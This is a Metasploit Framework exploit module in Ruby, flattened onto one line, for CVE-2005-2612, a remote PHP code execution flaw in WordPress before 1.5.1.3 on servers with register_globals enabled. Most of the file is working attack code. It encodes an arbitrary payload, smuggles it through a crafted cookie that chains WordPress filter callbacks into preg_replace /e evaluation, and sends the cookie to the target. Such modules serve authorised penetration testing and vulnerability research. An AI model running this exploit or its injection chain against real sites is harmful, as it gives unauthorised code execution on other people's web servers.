## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress cache_lastpostdate Arbitrary Code Execution', 'Description' => %q{ This module exploits an arbitrary PHP code execution flaw in the WordPress blogging software. This vulnerability is only present when the PHP 'register_globals' option is enabled (common for hosting providers). All versions of WordPress prior to 1.5.1.3 are affected. }, 'Author' => [ 'str0ke ', 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-2612'], ['OSVDB', '18672'], ['BID', '14533'], ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Compat' => { 'ConnectionType' => 'find', }, 'Space' => 512, }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Aug 9 2005', 'DefaultTarget' => 0)) register_options( [ OptString.new('URI', [true, "The full URI path to WordPress", "/"]), ], self.class) end def exploit enc = payload.encoded.unpack('C*').map { |c| "chr(#{c})"}.join('.') + ".chr(32)" str = Rex::Text.encode_base64('args[0]=eval(base64_decode('+enc+')).die()&args[1]=x') data = "wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_filter[query_vars][0][0][accepted_args]=0;"+ "wp_filter[query_vars][0][1][function]=base64_decode;wp_filter[query_vars][0][1][accepted_args]=1;"+ "cache_lastpostmodified[server]=//e;cache_lastpostdate[server]="+str+ ";wp_filter[query_vars][1][0][function]=parse_str;wp_filter[query_vars][1][0][accepted_args]=1;"+ "wp_filter[query_vars][2][0][function]=get_lastpostmodified;wp_filter[query_vars][2][0][accepted_args]=0;"+ "wp_filter[query_vars][3][0][function]=preg_replace;wp_filter[query_vars][3][0][accepted_args]=3;" # Trigger the command execution bug res = send_request_cgi({ 'uri' => datastore['URI'], 'cookie' => data }, 25) if (res) print_status("The server returned: #{res.code} #{res.message}") else print_status("No response from the server") end end end